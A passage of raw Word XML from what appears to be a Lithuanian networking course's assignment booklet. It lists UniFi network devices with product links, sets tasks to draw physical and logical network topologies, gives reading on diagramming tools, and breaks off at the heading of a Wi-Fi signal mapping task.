              <w:t>Nuoroda</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="26A1D6D5" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="135A9A57"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15DFAB56"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UniFi Security Gateway Model: USG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40BCD0C4" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId151" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.ui.com/unifi-routing/usg/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="34C7A993" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29BB64E0"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1519A165"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UniFi Switch 8 Model: US-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13516621" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId152" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.ui.com/unifi-switching/unifi-switch-8/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7803A724" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AC13EF9"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1299B6BE"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UniFi EdgeSwitch® 10XP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E045A29" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId153" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.ui.com/edgemax/edgeswitch-10xp/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="391460BC" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F2FFE86"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F442AA1"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UniFi AP AC LR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6524350F" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId154" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.ui.com/unifi/unifi-ap-ac-lr/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="028E24D9" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DCFCF6E"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0855A593"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UniFi Video NVR Model: UVC-NVR-2TB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58BDC07B" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId155" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.katalita.lt/details/ubiquiti-unifi-video-camera-nvr-2tb.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0C67A7E1" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22285D78"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="019686C3"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UniFi Protect G3 Dome Camera</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06BC99DF" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId156" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://store.ui.com/collections/unifi-protect-cameras/products/unifi-video-camera-g3-dome</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1736439E" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FA013A0"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2074" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B1DE21D"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UniFi Protect G3 Bullet Camera Model: UVC-G3-BULLET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2642" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="047853DF" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId157" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://store.ui.com/collections/unifi-protect-cameras/products/unifi-video-camera-g3-bullet</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25210DC1" w14:textId="689B6740" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC6341" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Užduotys, kurias r</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eikia atlikti:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001969FA" w14:textId="0668F090" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudarykite ir pateikite fizinę tinklo topologiją nuotraukos formatu. </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>šsaugokite programos</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>su kuria braiž</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ėte</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, projekto failą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A034C85" w14:textId="207DBDE2" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudarykite ir pateikite loginę tinklo topologiją nuotraukos formatu. </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>šsaugokite, programos</w:t>
      </w:r>
      <w:r w:rsidR="003B60A5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>su kuria braiž</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ė</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>te, projekto failą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B8D12" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397FAB3B" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8B90B" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Microsoft 365 Team (2019, rugsėjo 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Patarimai, kaip sudaryti savo tinklo diagramą. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId158">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="223FC732" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Lovinus, A. (2015, spalio 21). 5 Free Tools to Draw a Network Diagram. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Newegg + Business</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId159">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03C987BC" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">15 Best Network Diagram Software &amp; Topology Mapper Tools (Free&amp;Paid). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Networks Training</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId160">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.networkstraining.com/best-network-diagram-software/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6568DE1C" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Diagrams.net. Open source technology stack for building diagramming applications.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId161">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://app.diagrams.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="031DB576" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction to Packet Tracer. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco Networking Academy. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId162">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3713EDEA" w14:textId="7317FA61" w:rsidR="0066332E" w:rsidRPr="005A5C28" w:rsidRDefault="0066332E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64758F33" w14:textId="2DEF629C" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00683BC8"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7</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>WIFI TINKLO ANALIZĖ. SIGNALO STIPRUMO ŽEMĖLAPIS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D038DFE" w14:textId="05351B91" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B60A5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
